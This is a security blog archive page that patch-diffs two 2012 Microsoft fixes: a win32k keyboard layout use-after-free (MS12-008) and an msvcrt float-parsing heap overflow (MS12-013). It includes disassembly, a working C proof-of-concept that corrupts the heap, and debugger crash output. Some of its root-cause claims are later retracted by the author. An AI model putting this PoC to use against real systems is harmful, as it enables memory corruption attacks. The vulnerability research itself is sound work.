Monthly Archives: February 2012

MS12-008 : win32k.sys Keyboard Layout Use After Free vulnerability

Related CVE : CVE-2012-0154
Before Patch Binary : win32k.sys 6.1.7600.16920 (win7_gdr.111123-1510)
After Patch Binary : win32k.sys 6.1.7600.16948 (win7_gdr.120113-1505)

If you remember MS10-073 (Stuxnet), then MS12-008 may sound familiar. For background, refer to these articles: the analysis by Vupen and a public exploit.

After diffing win32k.sys with DarunGrim, I simply searched the patched functions for names containing the word “keyboard”. This led me to xxxLoadKeyboardLayoutEx(), where the differences in one basic block look interesting. Keep in mind that we are hunting for a use-after-free bug.

.text:BF815284 push eax ; Tag
.text:BF815285 push dword ptr [ebx+0Ch] ; P
.text:BF815288 call ds:__imp__ExFreePoolWithTag@8 ; ExFreePoolWithTag(x,x)
.text:BF81528E push ebx
.text:BF81528F call _HMMarkObjectDestroy@4 ; HMMarkObjectDestroy(x)
.text:BF815294 push ebx
.text:BF815295 call _HMUnlockObject@4 ; HMUnlockObject(x)

This is before the patch.

.text:BF815293 push edi ; Address
.text:BF815294 call _DestroyKF@4 ; DestroyKF(x)

This is after the patch. As you can see, the destructor routines have been wrapped into DestroyKF(). Let’s look inside DestroyKF().

.text:BF8E3F59 ; int __stdcall DestroyKF(PVOID Address)
.text:BF8E3F59 _DestroyKF@4 proc near ; CODE XREF: xxxLoadKeyboardLayoutEx(x,x,x,x,x,x,x,x,x)+1D6p
.text:BF8E3F59 ; DestroyKL(x)+37p ...
.text:BF8E3F59
.text:BF8E3F59 Address = dword ptr 8
.text:BF8E3F59
.text:BF8E3F59 mov edi, edi
.text:BF8E3F5B push ebp
.text:BF8E3F5C mov ebp, esp
.text:BF8E3F5E push esi
.text:BF8E3F5F mov esi, [ebp+Address]
.text:BF8E3F62 push esi
.text:BF8E3F63 call _HMMarkObjectDestroy@4 ; HMMarkObjectDestroy(x)
.text:BF8E3F68 test eax, eax
.text:BF8E3F6A jz short loc_BF8E3F83
.text:BF8E3F6C push esi
.text:BF8E3F6D call _RemoveKeyboardLayoutFile@4 ; RemoveKeyboardLayoutFile(x)
.text:BF8E3F72 push 0 ; Tag
.text:BF8E3F74 push dword ptr [esi+0Ch] ; P
.text:BF8E3F77 call ds:__imp__ExFreePoolWithTag@8 ; ExFreePoolWithTag(x,x)
.text:BF8E3F7D push esi ; Address
.text:BF8E3F7E call _HMFreeObject@4 ; HMFreeObject(x)
.text:BF8E3F83
.text:BF8E3F83 loc_BF8E3F83: ; CODE XREF: DestroyKF(x)+11j
.text:BF8E3F83 pop esi
.text:BF8E3F84 pop ebp
.text:BF8E3F85 retn 4
.text:BF8E3F85 _DestroyKF@4 endp

Oh yes. The order in which the free/destructor functions are invoked has changed somewhat, but the most interesting point is _RemoveKeyboardLayoutFile@4(): the old version never called it, whereas the new version does.

Let’s see what _RemoveKeyboardLayoutFile() does.

.text:BF8E3F8D ; __stdcall RemoveKeyboardLayoutFile(x)
.text:BF8E3F8D _RemoveKeyboardLayoutFile@4 proc near ; CODE XREF: DestroyKF(x)+14p
.text:BF8E3F8D
.text:BF8E3F8D arg_0 = dword ptr 8
.text:BF8E3F8D
.text:BF8E3F8D mov edi, edi
.text:BF8E3F8F push ebp
.text:BF8E3F90 mov ebp, esp
.text:BF8E3F92 mov ecx, [ebp+arg_0]
.text:BF8E3F95 mov eax, _gpKbdTbl
.text:BF8E3F9A cmp eax, [ecx+10h]
.text:BF8E3F9D jnz short loc_BF8E3FA9
.text:BF8E3F9F mov _gpKbdTbl, offset _KbdTablesFallback
.text:BF8E3FA9
.text:BF8E3FA9 loc_BF8E3FA9: ; CODE XREF: RemoveKeyboardLayoutFile(x)+10j
.text:BF8E3FA9 mov eax, _gpKbdNlsTbl
.text:BF8E3FAE cmp eax, [ecx+18h]
.text:BF8E3FB1 jnz short loc_BF8E3FBA
.text:BF8E3FB3 and _gpKbdNlsTbl, 0
.text:BF8E3FBA
.text:BF8E3FBA loc_BF8E3FBA: ; CODE XREF: RemoveKeyboardLayoutFile(x)+24j
.text:BF8E3FBA mov eax, _gpkfList
.text:BF8E3FBF cmp ecx, eax
.text:BF8E3FC1 jnz short loc_BF8E3FCD
.text:BF8E3FC3 mov eax, [ecx+8]
.text:BF8E3FC6 mov _gpkfList, eax
.text:BF8E3FCB jmp short loc_BF8E3FDC
.text:BF8E3FCD ; ---------------------------------------------------------------------------
.text:BF8E3FCD
.text:BF8E3FCD loc_BF8E3FCD: ; CODE XREF: RemoveKeyboardLayoutFile(x)+34j
.text:BF8E3FCD ; RemoveKeyboardLayoutFile(x)+47j
.text:BF8E3FCD mov edx, eax
.text:BF8E3FCF mov eax, [eax+8]
.text:BF8E3FD2 cmp ecx, eax
.text:BF8E3FD4 jnz short loc_BF8E3FCD
.text:BF8E3FD6 mov eax, [eax+8]
.text:BF8E3FD9 mov [edx+8], eax
.text:BF8E3FDC
.text:BF8E3FDC loc_BF8E3FDC: ; CODE XREF: RemoveKeyboardLayoutFile(x)+3Ej
.text:BF8E3FDC pop ebp
.text:BF8E3FDD retn 4
.text:BF8E3FDD _RemoveKeyboardLayoutFile@4 endp

Given the data structure as an argument, RemoveKeyboardLayoutFile() walks the linked list whose head pointer is stored in the global variable _gpkfList. While traversing the list, it looks for the entry identical to the argument and unlinks it (the next pointer lives at offset 8). Before that, it resets _gpKbdTbl to _KbdTablesFallback and clears _gpKbdNlsTbl if they match the tables referenced by the object (the fields at +10h and +18h). OK, fair enough. This logic also matches the function name.
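The unlink step can be sketched in plain C. This is a minimal user-mode sketch under stated assumptions, not win32k code: KbdFile, g_list_head and remove_kbd_file() are hypothetical names, and only the next link is modeled. Unlike the loop in the disassembly, which has no end-of-list test, this version stops when it reaches NULL.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for the keyboard layout file object. Only the
 * "next" link (found at offset 8 in the 32-bit listing) is modeled. */
typedef struct KbdFile {
    struct KbdFile *next;
    int id;                     /* illustrative payload, not in the original */
} KbdFile;

static KbdFile *g_list_head = NULL;   /* plays the role of gpkfList */

/* Unlink `target` from the singly linked list.
 * Returns 1 if the entry was found and removed, 0 otherwise. */
static int remove_kbd_file(KbdFile *target)
{
    KbdFile **link = &g_list_head;

    assert(target != NULL);
    while (*link != NULL) {
        if (*link == target) {
            *link = target->next;   /* bypass the entry */
            target->next = NULL;
            return 1;
        }
        link = &(*link)->next;
    }
    return 0;                       /* not in the list */
}
```

Walking a pointer-to-pointer handles the head case and the middle case with the same code path, whereas the disassembly treats the head entry separately.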

Then our next question should be: which function initializes (or updates) this linked list? By following the cross references to _gpkfList, you will find that LoadKeyboardLayoutFile() updates this data structure. It first checks whether the requested layout file is already loaded; if it is not, it inserts a new entry into the linked list.

Alright. Now we can see why this is a use-after-free bug. When xxxLoadKeyboardLayoutEx() destroys the target data structure, it forgets to clean up the linked list. Thus, even after the actual buffer is freed, the linked list still claims that the data structure exists. If we then request the same layout file again, the lookup returns the stale entry and the code uses the buffer pointer, which has already been freed.
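To make the stale-entry problem concrete, here is a small user-mode model in C. Everything in it is an assumption for illustration: the LayoutFile struct, the fixed pool, the freed flag (which stands in for "the pool memory was released") and the function names are hypothetical, and nothing here touches real freed memory. It only shows how a cached lookup can hand back an entry that has already been destroyed when the destroy path skips the unlink.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define MAX_FILES 4

/* Hypothetical model of a cached layout file entry. */
typedef struct LayoutFile {
    struct LayoutFile *next;
    char name[16];
    bool freed;                 /* stands in for "backing memory released" */
} LayoutFile;

static LayoutFile g_pool[MAX_FILES];
static size_t g_used;
static LayoutFile *g_head;

/* Return the cached entry for `name`, or insert a new one at the head. */
static LayoutFile *load_layout_file(const char *name)
{
    for (LayoutFile *p = g_head; p != NULL; p = p->next)
        if (strcmp(p->name, name) == 0)
            return p;           /* cache hit, even if p->freed is set */

    if (g_used == MAX_FILES)
        return NULL;
    LayoutFile *n = &g_pool[g_used++];
    strncpy(n->name, name, sizeof n->name - 1);
    n->name[sizeof n->name - 1] = '\0';
    n->freed = false;
    n->next = g_head;
    g_head = n;
    return n;
}

/* Destroy an entry. `unlink_first` selects the patched behaviour. */
static void destroy_layout_file(LayoutFile *f, bool unlink_first)
{
    assert(f != NULL);
    if (unlink_first) {
        for (LayoutFile **link = &g_head; *link != NULL; link = &(*link)->next) {
            if (*link == f) {
                *link = f->next;
                break;
            }
        }
    }
    f->freed = true;
}
```

Calling destroy_layout_file(f, false) and then loading the same name again returns the same pointer with freed set, which is the model's analogue of the bug. With unlink_first set to true, the second load creates a fresh entry instead.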

The last question is how to reach the vulnerable point (the destructor routines). Going back to the destructor code in xxxLoadKeyboardLayoutEx(), you will find that it is reachable when HMAllocObject() fails.

.text:BF815271 push 44h ; NumberOfBytes
.text:BF815273 push 0Dh ; char
.text:BF815275 push 0 ; int
.text:BF815277 push 0 ; int
.text:BF815279 call _HMAllocObject@16 ; HMAllocObject(x,x,x,x)
.text:BF81527E mov esi, eax
.text:BF815280 test esi, esi
.text:BF815282 jnz short loc_BF8152B4

How do we make the allocation fail? Refer to Tarjei Mandt’s comment on Twitter: “You can exhaust the user handle table or try to exceed the handle quota limit (win32k!gUserProcessHandleQuota)”. Note that his name is on the MS12-008 vulnerability description 🙂

I briefly tried this, but it didn’t work @.@ Because I don’t want to waste my time on brute-force-like approaches, I simply bought a Windows Internals book! 🙂

Update: I forgot to mention the upcoming patch for another keyboard layout vulnerability (still a zero-day!!), which was disclosed by a 0day exploit in the wild. The bug is as follows. A keyboard layout file (just like a .dll file) can be loaded into the kernel. Interestingly, a keyboard layout file contains hard-coded address pointers 🙂 Later, the kernel accesses the user-space address by creating a mapping, but it does not validate the user address pointer located in the keyboard layout file. This eventually crashes the system. Yes, this is a placeholder for MSxx-xxx.

MS12-013: Vulnerability in C Run-Time Library could allow remote code execution

Update (Feb 16): Confirmed that the PoC works. You can download the compiled .exe file, which is dynamically linked with msvcrt.dll. Tested on Windows 7 32-bit and 64-bit. Download ms12-013poc.exe. Again, thanks to the anonymous comments.

Update (Feb 16): Shame on me. The last analysis was incorrect. Surprisingly, the PoC was quite correct and does trigger the vulnerability. I would say this analysis is still not fully confirmed either. To trigger the vulnerability, the best way is to compile the PoC with Visual Studio 6 using the /MD option. A binary compiled this way may trigger the vulnerability on most other machines, including Windows 7, because Windows 7 also ships a vulnerable MSVCRT.dll in its system directory. Visual Studio 2003 and later versions (as the MS tech blog described) cannot dynamically link against the old MSVCRT.dll (I’ve tried some tricks, but they didn’t work). They only link to MSVCRxx.dll, which is not vulnerable to MS12-013.

Update: This may not trigger the actual heap overflow, and I’m not sure whether this routine is the one patched for MS12-013. Please read the comments.

A C Run-Time vulnerability! I guess you were all excited to see the title, because “C Run-Time” sounds as if this vulnerability would work against numerous Windows products? To be honest, I don’t quite trust MS tech descriptions, but you had better read their interpretation of this bug. They said the only attack vector would be through ‘Windows Media Player’. (Again, you don’t have to trust them …)

MS patched msvcrt.dll, the well-known C Run-Time library in Windows. With DarunGrim, you can see that the function __check_float_string() is patched (you may not see the symbol there, but IDA FLIRT should be able to recover it). Because the C Run-Time library is distributed with its source code in Visual Studio, you can also read the source here: VC/CRT/src/input.c::int __check_float_string(size_t,size_t *, _TCHAR**, _TCHAR*, int*).

__check_float_string() works as follows. The C Run-Time library starts with a statically sized buffer (_TCHAR floatstring[_CVTBUFSIZE + 1];) and reallocates it whenever more space is required. When it reallocates, it simply allocates a buffer of twice the size and doubles the size variable as well. The first growth uses calloc(); later ones use recalloc(). MS12-013 arises when the function stores the new buffer size.

.text:6FFBEA1E loc_6FFBEA1E: ; CODE XREF: sub_6FFBE9F3+25j
.text:6FFBEA1E push 2
.text:6FFBEA20 push ebx ; mov ebx, [esi] in the entry block
.text:6FFBEA21 call __calloc_crt

.text:6FFBEA26 pop ecx
.text:6FFBEA27 pop ecx
.text:6FFBEA28 mov [edi], eax
.text:6FFBEA2A test eax, eax
.text:6FFBEA2C jz short loc_6FFBEA1A
.text:6FFBEA2E push [ebp+pulResult] ; size_t
.text:6FFBEA31 mov eax, [ebp+arg_8]
.text:6FFBEA34 push [ebp+arg_4] ; void *
.text:6FFBEA37 mov dword ptr [eax], 1
.text:6FFBEA3D push dword ptr [edi] ; void *
.text:6FFBEA3F call _memcpy

.text:6FFBEA44 mov eax, [esi]
.text:6FFBEA46 push esi ; pulResult
.text:6FFBEA47 add eax, eax ; !!!!
.text:6FFBEA49 push 2 ; int
.text:6FFBEA4B push eax ; int
.text:6FFBEA4C mov [esi], eax
.text:6FFBEA4E call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)

.text:6FFBEA53 add esp, 18h
.text:6FFBEA56 test eax, eax
.text:6FFBEA58 jge short loc_6FFBEA78

This is the old version. Focus on the arguments of __calloc_crt() and SizeTMult(). The allocation is __calloc_crt(Size, 2). However, when SizeTMult() is invoked to record the size variable, the call is SizeTMult(Size*2, 2, &pResult). Thus, although the allocated buffer is actually Size*2 bytes, the size variable stores Size*2*2. Because of this miscomputation, a heap overflow is triggered outside of this function. (Note: the previous analysis claimed the cause was an integer overflow, but it is not. Thanks to the comments from anonymous folks.)
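The mismatch is easy to see with concrete numbers. The following C sketch only models the bookkeeping of the first growth step as read from the listing; GrowResult, grow_unpatched() and grow_patched() are hypothetical names, and the model ignores the memcpy and the overflow check inside SizeTMult().

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model of the first growth step in __check_float_string().
 * `count` is the value loaded from [esi]; `elem_size` is 2 in the listing. */
typedef struct GrowResult {
    size_t allocated_bytes;   /* what __calloc_crt(count, elem_size) provides */
    size_t recorded_size;     /* what the size variable holds afterwards */
} GrowResult;

/* Old binary: "add eax, eax" doubles the value before SizeTMult(x, 2). */
static GrowResult grow_unpatched(size_t count, size_t elem_size)
{
    GrowResult r;
    assert(elem_size > 0);
    r.allocated_bytes = count * elem_size;
    r.recorded_size = (count + count) * elem_size;
    return r;
}

/* Patched binary: SizeTMult(count, 2) with no extra doubling. */
static GrowResult grow_patched(size_t count, size_t elem_size)
{
    GrowResult r;
    assert(elem_size > 0);
    r.allocated_bytes = count * elem_size;
    r.recorded_size = count * elem_size;
    return r;
}
```

With a count of 350 and an element size of 2, the unpatched model allocates 700 bytes (0x2bc, the requested size reported in the heap message of the debugger output) but records 1400, so later writes believe they have twice the room that exists. The patched model records exactly what was allocated.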

The PoC seems to be still valid. __check_float_string() keeps track of a single floating-point string, which corresponds to one format specifier (like %f). If you supply a very long floating-point string, like 1.0000…000, it will reallocate the buffer but then misjudge the size of the reallocated buffer. Note that this PoC has never been tested in the vulnerable environment. It would be great to hear from you whether it actually works.


// MS12-013 PoC
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(linker, "/NODEFAULTLIB:msvcrt90.lib")
#pragma comment(linker, "/NODEFAULTLIB:msvcrt80.lib")
#pragma comment(lib, "vs6/msvcrt.lib") // I've scratched this file from VC6
#define BUF_SIZE 0x300

int main( void )
{
    char * pStr;
    float f;
    int i;

    // Build "1." followed by a long run of zeros: one very long float token.
    pStr = (char*)malloc(BUF_SIZE);
    if (pStr == NULL) return 1;
    memset(pStr, 0, BUF_SIZE);
    strcpy(pStr, "1.");
    for( i=1; i<=BUF_SIZE-10; i++){
        strcat(pStr, "0");
    }

    printf("Before scanf()\n");

    sscanf(pStr,"%f", &f); // __check_float_string() grows its buffer here

    printf("After scanf()\n");

    printf("%f\n", f); // place holder for the floating point library
    return 0;
}

The WinDbg debugging output is shown below.

0:000:x86> g
HEAP[testme.exe]: Heap block at 00823738 modified at 008239FC past requested size of 2bc
(1f24.1674): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll32!RtlpBreakPointHeap+0x23:
77ca04e4 cc int 3
0:000:x86> g
HEAP[testme.exe]: Invalid address specified to RtlFreeHeap( 00820000, 00823740 )
(1f24.1674): WOW64 breakpoint - code 4000001f (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll32!RtlpBreakPointHeap+0x23:
77ca04e4 cc int 3
0:000:x86> g
(1f24.1674): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll32!RtlpFreeHeap+0x85a:
77c27074 8b19 mov ebx,dword ptr [ecx] ds:002b:30303030=????????
0:000:x86> r
eax=00823a18 ebx=00000046 ecx=30303030 edx=008207e0 esi=008207d8 edi=00820000
eip=77c27074 esp=0018fb30 ebp=0018fc10 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010287
ntdll32!RtlpFreeHeap+0x85a:
77c27074 8b19 mov ebx,dword ptr [ecx] ds:002b:30303030=????????

This is the patched version. Again, focus on the arguments of SizeTMult(): the call is now SizeTMult(Size, 2, &pResult). MS removed the “add eax, eax” instruction.

.text:6FFBF935 push [ebp+pulResult] ; size_t
.text:6FFBF938 mov eax, [ebp+arg_8]
.text:6FFBF93B push [ebp+arg_4] ; void *
.text:6FFBF93E mov dword ptr [eax], 1
.text:6FFBF944 push dword ptr [esi] ; void *
.text:6FFBF946 call _memcpy
.text:6FFBF94B push edi ; pulResult
.text:6FFBF94C push 2 ; int
.text:6FFBF94E push dword ptr [edi] ; int
.text:6FFBF950 call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)
.text:6FFBF955 add esp, 18h

—————————–

.text:6FFBEA64 loc_6FFBEA64: ; CODE XREF: sub_6FFBE9F3+12j
.text:6FFBEA64 push 2 ; Size
.text:6FFBEA66 push ebx ; Count
.text:6FFBEA67 push eax ; Memory
.text:6FFBEA68 call __recalloc_crt
.text:6FFBEA6D add esp, 0Ch
.text:6FFBEA70 test eax, eax
.text:6FFBEA72 jz short loc_6FFBEA1A
.text:6FFBEA74 mov [edi], eax
.text:6FFBEA76 shl dword ptr [esi], 1
.text:6FFBEA78

This is the old version.

.text:6FFBF966 push 2 ; Size
.text:6FFBF968 push ebx ; Count
.text:6FFBF969 push eax ; Memory
.text:6FFBF96A call __recalloc_crt
.text:6FFBF96F add esp, 0Ch
.text:6FFBF972 test eax, eax
.text:6FFBF974 jz short loc_6FFBF921
.text:6FFBF976 push edi ; pulResult
.text:6FFBF977 mov [esi], eax
.text:6FFBF979 push 2 ; int
.text:6FFBF97B push dword ptr [edi] ; int
.text:6FFBF97D call ?SizeTMult@@YAJIIPAI@Z ; SizeTMult(uint,uint,uint *)
.text:6FFBF982 add esp, 0Ch
.text:6FFBF985 jmp short loc_6FFBF958

This is the patched version. Yes, it seems obvious. After the buffer is reallocated (to double the size), the new size is stored again. The old version recomputed the doubled size with an SHL instruction, whereas the new version uses SizeTMult(). If you are familiar with integer overflow bugs, replacing primitive multiplication instructions with SizeTMult() is a typical sign of an integer overflow patch. To be specific, SizeTMult() multiplies its input values and returns a failure code (a negative HRESULT, which is why the caller tests the result with jge) if the multiplication overflows. This allows the caller to catch the integer overflow easily.
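For readers who have not used this kind of helper, here is a minimal C sketch of an overflow-checked multiplication in the spirit of SizeTMult(). It is not the intsafe.h implementation: checked_size_mul() is a hypothetical name, it returns a bool rather than an HRESULT, and writing SIZE_MAX on failure is just an illustrative choice.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: multiply a by b, reporting overflow instead of
 * silently wrapping. Returns true on success, false on overflow. */
static bool checked_size_mul(size_t a, size_t b, size_t *result)
{
    assert(result != NULL);
    if (a != 0 && b > SIZE_MAX / a) {
        *result = SIZE_MAX;     /* illustrative poison value on failure */
        return false;
    }
    *result = a * b;
    return true;
}
```

A caller doubling a buffer size would write something like `if (!checked_size_mul(size, 2, &size)) { /* bail out */ }`, whereas a bare shift or multiply would wrap around without any signal.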

To understand the logic here, you can refer to the source code distributed with MS Visual Studio: VC/CRT/src/input.c::int __check_float_string(size_t,size_t *, _TCHAR**, _TCHAR*, int*) (see his tweet). The C Run-Time library starts with a statically sized buffer (_TCHAR floatstring[_CVTBUFSIZE + 1];) and reallocates it as more space is required. (This is actually done by both calloc() and realloc(), but you can simply think of it as if only realloc() were used.)

When it needs a larger buffer, it simply allocates twice the previous size and stores the doubled size. However, because the old version simply uses ‘SHL’, an integer overflow could occur once the size grows beyond 2G (i.e. 0x80000000).

This routine keeps a buffer for the single matched target of each format string element. Thus, if you supply a very long string (such as a very long floating-point string, 1.0000000000000000….0000), the size of the internal buffer is doubled over and over while this element is read, and eventually this leads to the integer overflow.


If you compile this with the /MT option, the C Run-Time library will be statically linked (via libcmt.lib). If you compile with the /MD option, it will be dynamically linked against msvcrt.dll (via the msvcrt.lib import library). The MS TechNet blog describes in more detail which versions of the run-time library are vulnerable, so you may want to check their description.

Update (Feb 15)
_recalloc(void *Memory, size_t Count, size_t Size) checks for the integer overflow condition (possibly triggered by Count*Size), but this check is done only if Count < 0. This implies _recalloc() cannot be used for integer overflows. lol

.text:6FF80457 ; void *__cdecl _recalloc(void *Memory, size_t Count, size_t Size)
.text:6FF80457 __recalloc proc near ; CODE XREF: __recalloc_crt+12p
.text:6FF80457 ; sub_6FF7CDEE+1CFBFp …
.text:6FF80457
.text:6FF80457 Memory = dword ptr 8
.text:6FF80457 Count = dword ptr 0Ch
.text:6FF80457 Size = dword ptr 10h
.text:6FF80457
.text:6FF80457 ; FUNCTION CHUNK AT .text:6FF9467C SIZE 0000001F BYTES
.text:6FF80457
.text:6FF80457 mov edi, edi
.text:6FF80459 push ebp
.text:6FF8045A mov ebp, esp
.text:6FF8045C mov ecx, [ebp+Count]
.text:6FF8045F push esi
.text:6FF80460 xor esi, esi
.text:6FF80462 cmp ecx, esi
.text:6FF80464 jbe short loc_6FF80476
.text:6FF80466 push 0FFFFFFE0h
.text:6FF80468 xor edx, edx
.text:6FF8046A pop eax
.text:6FF8046B div ecx
.text:6FF8046D cmp eax, [ebp+Size]
.text:6FF80470 jb loc_6FF9467C
.text:6FF80476
.text:6FF80476 loc_6FF80476: ; CODE XREF: __recalloc+Dj
.text:6FF80476 imul ecx, [ebp+Size]
.text:6FF8047A push ecx ; size_t
.text:6FF8047B push [ebp+Memory] ; void *
.text:6FF8047E call _realloc
.text:6FF80483 pop ecx
.text:6FF80484 pop ecx

Thus, while Count is still a positive value, there are no internal overflow checks. To bypass this check routine, you have to use the Unicode functions. This sets Size=4, so Count doesn’t have to be negative to cause the integer overflow.

.text:6FF9C8A9 push 4 ; Size
.text:6FF9C8AB push ebx ; Count
.text:6FF9C8AC push eax ; Memory
.text:6FF9C8AD call __recalloc_crt